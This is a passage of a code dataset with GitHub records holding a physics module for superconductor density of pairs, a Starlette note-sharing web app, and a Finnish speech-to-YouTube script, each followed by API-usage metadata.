"scipy.stats.norm.cdf", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 25, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 110, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 167, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 169, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 196, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 210, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 220, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 237, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 256, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 261, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 272, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 273, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 274, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 275, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 278, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 280, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ProcessPoolExecutor", "line_number": 287, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 287, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 287, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 294, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 294, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 294, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 310, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 326, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 332, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 353, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 353, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 353, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 364, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 364, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 364, "usage_type": "name"}, {"api_name": "scipy.stats.mstats.mquantiles", "line_number": 397, "usage_type": "call"}, {"api_name": "scipy.stats.mstats", "line_number": 397, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 397, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 406, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 433, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 440, "usage_type": "call"}, {"api_name": "random.random", "line_number": 442, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 454, "usage_type": "call"}, {"api_name": "pkgutil.get_data", "line_number": 470, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 477, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 484, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 487, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 491, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 495, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 499, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 503, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 507, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 511, "usage_type": "call"}, {"api_name": "random.random", "line_number": 514, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 527, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 543, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 544, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 566, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 567, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 589, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 592, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 595, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 598, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 601, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 604, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 607, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 628, "usage_type": "call"}, {"api_name": "random.random", "line_number": 630, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 642, "usage_type": "call"}]}
+{"seq_id": "4060741202", "text": "import numpy as np\nimport numba as nb\nfrom superconductivity.density_of_states import usadel_pairing_angle\n\n\ndef dop_bcs(en, delta, real=True):\n \"\"\"\n Compute the density of pairs for a generic BCS superconductor.\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of pairs. The default is\n True.\n Returns\n -------\n dop: numpy.ndarray\n density of pairs as a function of en\n \"\"\"\n en = np.atleast_1d(en)\n dop = np.empty(en.shape, dtype=np.complex)\n _dop(dop, en, delta, 0, real=real)\n return dop.real if real else dop.imag\n\n\ndef dop_dynes(en, delta, gamma, real=True):\n \"\"\"\n Compute the density of pairs for a Dynes superconductor. Functional\n form from Herman et al. Phys. Rev. B, 96, 1, 2017.\n (doi:10.1103/PhysRevB.96.014509)\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n gamma: float (optional)\n Dynes parameter for broadening the density of states in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of pairs. The default is\n True.\n Returns\n -------\n dop: numpy.ndarray\n density of pairs as a function of en\n \"\"\"\n en = np.atleast_1d(en)\n dop = np.empty(en.shape, dtype=np.complex)\n _dop(dop, en, delta, gamma, real=real)\n return dop.real if real else dop.imag\n\n\ndef dop_usadel(en, delta, alpha, real=True):\n \"\"\"\n Compute the density of pairs for an Usadel superconductor. Functional\n form from Coumou et al. Phys. Rev. B, 88, 18, 2013.\n (doi:10.1103/PhysRevB.88.180505)\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n alpha: float\n The disorder-dependent pair-breaking parameter in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of states. The default is\n True.\n Returns\n -------\n dos: numpy.ndarray\n density of states as a function of en\n \"\"\"\n theta = usadel_pairing_angle(en, delta, alpha)\n dop = np.sin(theta)\n return dop.real if real else dop.imag\n\n\n@nb.njit(cache=True)\ndef _dop(data, en, delta, gamma, real=True):\n zero = np.sqrt((en + 1j * gamma)**2 - delta**2) == 0\n data[zero & (en > 0)] = np.inf if real else -1j * np.inf\n data[zero & (en <= 0)] = -np.inf if real else -1j * np.inf\n en_c = en[~zero] + 1j * gamma\n data[~zero] = np.sign(en[~zero] + 1j) * delta / np.sqrt(en_c**2 - delta**2)\n", "repo_name": "zobristnicholas/superconductivity", "sub_path": "src/superconductivity/density_of_pairs.py", "file_name": "density_of_pairs.py", "file_ext": "py", "file_size_in_byte": 3307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.atleast_1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 55, "usage_type": "attribute"}, {"api_name": "superconductivity.density_of_states.usadel_pairing_angle", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.sign", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "1734897268", "text": "from starlette.applications import Starlette\nfrom starlette.responses import JSONResponse, RedirectResponse, PlainTextResponse, Response\nfrom starlette.config import Config\nfrom starlette.templating import Jinja2Templates\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.gzip import GZipMiddleware\nimport string\nimport random\nimport uuid\nfrom databases import Database\nfrom urllib.parse import unquote\nfrom pygments import highlight\nfrom pygments.lexers import guess_lexer\nfrom pygments.formatters import HtmlFormatter\nfrom hashlib import md5\n\nfrom app.authentication.Authenticator import UKAuthAuthenticator, BulkAuthenticator, CookieAuthenticator\nfrom app.storage.NoteStorage import LocalNoteStorage\nfrom app.models.Models import note, view as view_table, metadata\n\nconfig = Config(\".env\")\nDEBUG = config(\"DEBUG\", cast=bool, default=False)\nDATABASE_URL = config(\"DATABASE_URL\")\n\nmiddleware = [\n Middleware(GZipMiddleware, minimum_size=1000)\n]\n\napp = Starlette(debug=DEBUG, middleware=middleware)\ntemplates = Jinja2Templates(\"templates\")\napp.mount('/static', StaticFiles(directory='static'))\n\n\ndatabase = Database(DATABASE_URL)\n\nstorageBackend = LocalNoteStorage()\nauthenticator = BulkAuthenticator([UKAuthAuthenticator(), CookieAuthenticator()])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.route(\"/\")\nasync def root(req):\n claims = await authenticator.get_auth_claims(req)\n\n #TODO: .order_by()\n public_notes = await database.fetch_all(note.select().where(note.c.public == True).limit(10))\n\n public_and_views = [(pub_note, (await database.fetch_one(view_table.select().where(view_table.c.note_id == pub_note.id).alias(\"tmp\").count()))[0]) for pub_note in public_notes]\n\n if claims:\n user_notes = await database.fetch_all(note.select().where(note.c.owner == claims[\"userId\"]))\n return templates.TemplateResponse(\"main.html\", {\"request\": req, \"user\": claims, \"notes\": user_notes, \"public_notes\": public_and_views})\n else:\n previous_notes = [x[0].split(\"_\")[0] for x in filter(lambda x: \"_securityKey\" in x[0], req.cookies.items())]\n previous_notes_old = [(await database.fetch_one(note.select().where(note.c.note_id == note_id))) for note_id in previous_notes]\n\n if previous_notes_old:\n return templates.TemplateResponse(\"main.html\", {\"request\": req, \"user\": None, \"notes\": previous_notes_old, \"public_notes\": public_and_views})\n else:\n # User not logged in so redirect to new note\n location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n\n security_key = str(uuid.uuid4())\n\n await database.execute(note.insert(), values={\n \"file_name\": str(uuid.uuid4()),\n \"note_id\": location,\n \"security_key\": security_key,\n \"owner\": -1 if claims is None else claims[\"userId\"]\n })\n\n resp = templates.TemplateResponse(\"edit.html\", {\n \"request\": req,\n \"noteID\": location,\n \"content\": \"\",\n \"user\": claims\n })\n resp.set_cookie(f\"{location}_securityKey\", security_key)\n\n return resp\n\n\n@app.route(\"/edit/{note}\")\nasync def edit(req):\n claims = await authenticator.get_auth_claims(req)\n\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n if db_note is None:\n return RedirectResponse(\"/\")\n\n if not await authenticator.can_access_resource(req, db_note):\n return RedirectResponse(f\"/view/{db_note.note_id}\")\n\n content = await storageBackend.get(db_note.file_name)\n\n return templates.TemplateResponse(\"edit.html\", {\n \"request\": req,\n \"noteID\": db_note.note_id,\n \"content\": content,\n \"user\": claims\n })\n\n\n@app.route(\"/view/{note}\")\nasync def view(req):\n\n ip = req.client.host\n try:\n ip = req.headers['HTTP_X_FORWARDED_FOR']\n except KeyError as e:\n print(\"Not behind a proxy\")\n ip_hashed = md5(ip.encode(\"UTF-8\")).hexdigest()\n print(ip_hashed)\n\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n if db_note is None:\n return RedirectResponse(\"/\")\n\n await database.execute(view_table.insert(), values={\n \"note_id\": db_note.id,\n \"visitor_id\": ip_hashed,\n })\n\n content_raw = await storageBackend.get(db_note.file_name)\n content = highlight(content_raw, guess_lexer(content_raw), HtmlFormatter())\n\n view_count = await database.fetch_one(view_table.select().where(view_table.c.note_id == db_note.id).alias(\"tmp\").count())\n\n return templates.TemplateResponse(\"view.html\", {\n \"request\": req,\n \"content\": content,\n \"contentRaw\": content_raw,\n \"noteID\": db_note.note_id,\n \"view_count\": view_count[0],\n \"user\": await authenticator.get_auth_claims(req)\n })\n\n\n@app.route(\"/view/{note}/raw\")\nasync def view_raw(req):\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n if db_note is None:\n return RedirectResponse(\"/\")\n\n content = await storageBackend.get(db_note.file_name)\n\n if not content:\n return RedirectResponse(\"/\")\n\n return PlainTextResponse(content, media_type=\"text/plain\")\n\n\n@app.route(\"/view/{note}/embed\")\nasync def view_oembed(req):\n noteID = req.path_params[\"note\"]\n\n db_note = await database.fetch_one(note.select().where(note.c.note_id == noteID))\n\n content = await storageBackend.get(db_note.file_name)\n\n content = highlight(content, guess_lexer(content), HtmlFormatter())\n\n return JSONResponse({\n \"version\": \"1.0\",\n \"type\": \"rich\",\n \"title\": noteID,\n \"width\": 200,\n \"height\": 200,\n \"html\": content[:250]\n })\n\n\n@app.route(\"/pygmentStyle\")\nasync def style(req):\n return PlainTextResponse(HtmlFormatter().get_style_defs(\"#editor-pane\"), media_type=\"text/css\")\n\n\n@app.route(\"/newNote\")\nasync def new_note(req):\n claims = await authenticator.get_auth_claims(req)\n\n location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n security_key = str(uuid.uuid4())\n file_name = str(uuid.uuid4())\n\n await database.execute(note.insert(), values={\n \"file_name\": file_name,\n \"note_id\": location,\n \"security_key\": security_key,\n \"owner\": -1 if claims is None else claims[\"userId\"]\n })\n\n await storageBackend.set(file_name, \"\")\n\n resp = RedirectResponse(f\"/edit/{location}\")\n resp.set_cookie(f\"{location}_securityKey\", security_key)\n return resp\n\n\n# Consider using a websocket in future\n@app.route(\"/saveNote/{note}\", methods=[\"POST\"])\nasync def save_note(req):\n # Get the file path for this note\n json_data = await req.json()\n\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n if not await authenticator.can_access_resource(req, db_note):\n return Response(status_code=403)\n\n await storageBackend.set(db_note.file_name, unquote(json_data[\"content\"]))\n\n return JSONResponse({\n \"Status\": 1\n })\n\n\n@app.route(\"/note/{id}/set-public\")\nasync def set_note_public(req):\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"id\"]))\n\n if not await authenticator.can_access_resource(req, db_note):\n return Response(status_code=403)\n\n await database.execute(note.update().where(note.c.note_id == req.path_params[\"id\"]).values(public=True))\n\n return Response(status_code=200)\n\n\n@app.route(\"/clone/{note}\", methods=[\"POST\"])\nasync def save_note(req):\n claims = await authenticator.get_auth_claims(req)\n\n location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n security_key = str(uuid.uuid4())\n file_name = str(uuid.uuid4())\n\n await database.execute(note.insert(), values={\n \"file_name\": file_name,\n \"note_id\": location,\n \"security_key\": security_key,\n \"owner\": -1 if claims is None else claims[\"userId\"]\n })\n\n original_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n original_content = await storageBackend.get(original_note.file_name)\n await storageBackend.set(file_name, original_content)\n\n resp = PlainTextResponse(location)\n resp.set_cookie(f\"{location}_securityKey\", security_key)\n return resp\n", "repo_name": "CUB3D/QuickPasteRedux", "sub_path": "app/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "starlette.config.Config", "line_number": 22, "usage_type": "call"}, {"api_name": "starlette.middleware.Middleware", "line_number": 27, "usage_type": "call"}, {"api_name": "starlette.middleware.gzip.GZipMiddleware", "line_number": 27, "usage_type": "argument"}, {"api_name": "app.authentication.Authenticator", "line_number": 30, "usage_type": "name"}, {"api_name": "starlette.applications.Starlette", "line_number": 30, "usage_type": "call"}, {"api_name": "starlette.templating.Jinja2Templates", "line_number": 31, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.mount", "line_number": 32, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 32, "usage_type": "name"}, {"api_name": "starlette.staticfiles.StaticFiles", "line_number": 32, "usage_type": "call"}, {"api_name": "databases.Database", "line_number": 35, "usage_type": "call"}, {"api_name": "app.storage.NoteStorage.LocalNoteStorage", "line_number": 37, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.BulkAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.UKAuthAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.CookieAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.on_event", "line_number": 41, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 41, "usage_type": "name"}, {"api_name": "app.authentication.Authenticator.on_event", "line_number": 46, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 46, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 56, "usage_type": "attribute"}, {"api_name": "app.models.Models.view.select", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 58, "usage_type": "name"}, {"api_name": "app.models.Models.view.c", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.Models.note.select", "line_number": 61, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Models.note.select", "line_number": 65, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 65, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 65, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 71, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 71, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 71, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 73, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 75, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 76, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 51, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 51, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 97, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 97, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 97, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 93, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 93, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 123, "usage_type": "call"}, {"api_name": "app.models.Models.note.select", "line_number": 126, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 126, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 126, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "app.models.Models.view.insert", "line_number": 131, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 131, "usage_type": "name"}, {"api_name": "pygments.highlight", "line_number": 137, "usage_type": "call"}, {"api_name": "pygments.lexers.guess_lexer", "line_number": 137, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 137, "usage_type": "call"}, {"api_name": "app.models.Models.view.select", "line_number": 139, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 139, "usage_type": "name"}, {"api_name": "app.models.Models.view.c", "line_number": 139, "usage_type": "attribute"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 115, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 115, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 153, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 153, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 153, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 156, "usage_type": "call"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 161, "usage_type": "call"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 163, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 151, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 151, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 170, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 170, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygments.highlight", "line_number": 174, "usage_type": "call"}, {"api_name": "pygments.lexers.guess_lexer", "line_number": 174, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 174, "usage_type": "call"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 176, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 166, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 166, "usage_type": "name"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 188, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 188, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 186, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 186, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 195, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 195, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 195, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 196, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 197, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 199, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 199, "usage_type": "name"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 208, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 191, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 191, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 219, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 219, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 219, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 222, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 224, "usage_type": "call"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 226, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 214, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 214, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 233, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 233, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 233, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 236, "usage_type": "call"}, {"api_name": "app.models.Models.note.update", "line_number": 238, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 238, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 238, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 231, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 231, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 247, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 247, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 247, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 248, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 249, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 251, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 251, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 258, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 258, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 258, "usage_type": "attribute"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 243, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 243, "usage_type": "name"}]}
+{"seq_id": "104988596", "text": "import os\nimport sys\nimport time\nimport speech_recognition as sr\nimport webbrowser\nfrom googleapiclient.discovery import build\nfrom PIL import Image\nfrom dotenv import load_dotenv\nload_dotenv()\n\n# Google API and speech recognition initialization\nGOOGLE_API_KEY = os.getenv('GOOGLE_API_KEY')\nyoutube = build('youtube', 'v3', developerKey=GOOGLE_API_KEY)\nr = sr.Recognizer()\nmic = sr.Microphone()\n\n\ndef get_audio():\n with mic as source:\n # Tweaking sound recognition to filter out background noise\n r.dynamic_energy_threshold = False\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 1200\n print('Puhu....')\n audio = r.listen(source)\n print(audio)\n voice_data = ' '\n try:\n voice_data = r.recognize_google(audio, language='fi-FI')\n print(voice_data)\n except sr.UnknownValueError:\n print('I did not get that.')\n except sr.RequestError:\n print('Sorry, we have some techinal difficulties.')\n return voice_data\n\n\ndef send_response(vd):\n if vd.startswith('video '):\n query = vd.split(' ', 1)\n query_response = get_video(query[1])\n if query_response['items']: # User's query finds videos\n video_id = query_response['items'][0]['id']['videoId']\n else:\n return print('We found no videos with your request. :-/')\n video_url = f'https://www.youtube.com/watch?v={video_id}'\n webbrowser.get().open(video_url)\n # Ends the program\n if vd == 'exit':\n sys.exit()\n\n\ndef get_video(query):\n # pylint: disable=maybe-no-member\n req = youtube.search().list(q=query, type='video', maxResults=1, part='snippet')\n res = req.execute()\n return res\n\n\nwhile True:\n voice_data = get_audio()\n send_response(voice_data)\n", "repo_name": "Ahors/speech_recognition", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.build", "line_number": 13, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 15, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 31, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}]}
